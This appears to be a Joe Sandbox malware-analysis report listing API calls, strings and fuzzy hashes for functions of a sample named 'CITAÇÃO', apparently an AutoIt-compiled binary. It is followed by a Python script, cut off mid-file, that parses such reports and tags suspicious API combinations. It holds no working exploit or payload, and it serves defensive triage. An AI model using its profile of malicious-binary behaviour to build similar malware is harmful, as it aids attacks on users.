                                                      • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                      • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                      • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: DeleteDestroyObject$IconWindow
                                                      • String ID:
                                                      • API String ID: 3349847261-0
                                                      • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                      • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                      • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                      • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                      • String ID:
                                                      • API String ID: 2223660684-0
                                                      • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                      • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                      • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                      • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                      APIs
                                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                      • LineTo.GDI32(?,?,?), ref: 00447326
                                                      • EndPath.GDI32(?), ref: 00447336
                                                      • StrokePath.GDI32(?), ref: 00447344
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                      • String ID:
                                                      • API String ID: 2783949968-0
                                                      • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                      • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                      • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                      • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                      • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                      • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 2710830443-0
                                                      • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                      • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                      • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                      • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
• UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
• Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
• Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
• Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
APIs
• GetDesktopWindow.USER32 ref: 00472B63
• GetDC.USER32(00000000), ref: 00472B6C
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
• ReleaseDC.USER32(00000000,?), ref: 00472B99
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
• Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
• Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
• Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
APIs
• GetDesktopWindow.USER32 ref: 00472BB2
• GetDC.USER32(00000000), ref: 00472BBB
• GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
• ReleaseDC.USER32(00000000,?), ref: 00472BE8
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
• Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
• Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
• Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
APIs
• __getptd_noexit.LIBCMT ref: 00415150
  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
• CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
• __freeptd.LIBCMT ref: 0041516B
• ExitThread.KERNEL32 ref: 00415173
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
• String ID:
• API String ID: 1454798553-0
• Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
• Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
• Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
• Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: _strncmp
• String ID: Q\E
• API String ID: 909875538-2189900498
• Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
• Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
• Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
• Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
APIs
• OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
  • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
• String ID: AutoIt3GUI$Container
• API String ID: 2652923123-3941886329
• Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
• Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
• Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
• Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: _memmove_strncmp
• String ID: U$\
• API String ID: 2666721431-100911408
• Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
• Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
• Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
• Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
APIs
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• __wcsnicmp.LIBCMT ref: 00467288
• WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: Connection__wcsnicmp_wcscpy_wcslen
• String ID: LPT
• API String ID: 3035604524-1350329615
• Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
• Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
• Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
• Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: _memmove
• String ID: \$h
• API String ID: 4104443479-677774858
• Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
• Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
• Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
• Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
Similarity
• API ID: _memcmp
• String ID: &
• API String ID: 2931989736-1010288
• Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
• Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
• Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
• Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
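The entries above follow one layout throughout the report: an "APIs" block lists the Win32 and CRT calls made directly from one function (lines marked "Part of subcall function" belong to a callee), and the "Similarity" block gives the API ID, the String ID, the numeric "API String ID" that pairs a hash of the API set with a hash of the string set (the second part is 0 when no strings are referenced), and the opcode and instruction fuzzy hashes. The Python script below is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: it parses that layout into per-function records, tags a few API combinations worth a second look (the tag list is this example's own assumption, not a Joe Sandbox signature), and groups functions that share an "API String ID", so that identical API profiles with different "Opcode ID" values stand out, as with the two GetDeviceCaps functions at 00472B63 and 00472BB2. The sample text embedded in the script is constructed from four entries of this listing with the indentation, link text and most metadata lines removed.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: four entries copied from the listing above, trimmed.
SAMPLE_REPORT = """\
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
• GetCurrentThreadId.KERNEL32 ref: 004364A3
• AttachThreadInput.USER32(00000000), ref: 004364AA
• String ID:
• API String ID: 2710830443-0
APIs
• GetDesktopWindow.USER32 ref: 00472B63
• GetDC.USER32(00000000), ref: 00472B6C
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
• ReleaseDC.USER32(00000000,?), ref: 00472B99
• API String ID: 2889604237-0
• Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
APIs
• GetDesktopWindow.USER32 ref: 00472BB2
• GetDC.USER32(00000000), ref: 00472BBB
• GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
• ReleaseDC.USER32(00000000,?), ref: 00472BE8
• API String ID: 2889604237-0
• Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
APIs
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
• __wcsnicmp.LIBCMT ref: 00467288
• WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
• String ID: LPT
• API String ID: 3035604524-1350329615
"""

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str  # call-site address in the dump

@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    subcalls: List[Tuple[str, ApiCall]] = field(default_factory=list)  # (callee address, call)
    fields: Dict[str, str] = field(default_factory=dict)

API_RE = re.compile(r"^(?P<name>[\w@$?]+)\.(?P<module>[\w.]+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*(?P<rest>.+)$")
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<value>.*)$")

def parse_api_call(text: str) -> Optional[ApiCall]:
    m = API_RE.match(text)
    args = m.group("args").split(",") if m and m.group("args") else []
    return ApiCall(m.group("name"), m.group("module"), args, m.group("ref").upper()) if m else None

def parse_report(text: str) -> List[FunctionEntry]:
    """'APIs' opens a new entry; bullets are API calls, subcall lines or 'Key: Value' metadata."""
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
        elif cur is not None and line.startswith("•"):
            body = line.lstrip("•").strip()
            sub = SUBCALL_RE.match(body)
            call = parse_api_call(sub.group("rest") if sub else body)
            fld = FIELD_RE.match(body)
            if sub and call:
                cur.subcalls.append((sub.group("caller").upper(), call))
            elif call:
                cur.apis.append(call)
            elif fld:  # metadata such as 'API String ID'; a repeated key overwrites
                cur.fields[fld.group("key")] = fld.group("value").strip()
    return entries

# Assumed triage labels (this example's own, not Joe Sandbox signatures): a
# function is tagged when every API in the set is called directly from it.
API_TAGS = [
    ({"AttachThreadInput", "GetWindowThreadProcessId"}, "attaches to another window's input queue"),
    ({"WNetUseConnectionW"}, "maps a network resource or redirected device"),
    ({"GetDeviceCaps"}, "queries display capabilities"),
]

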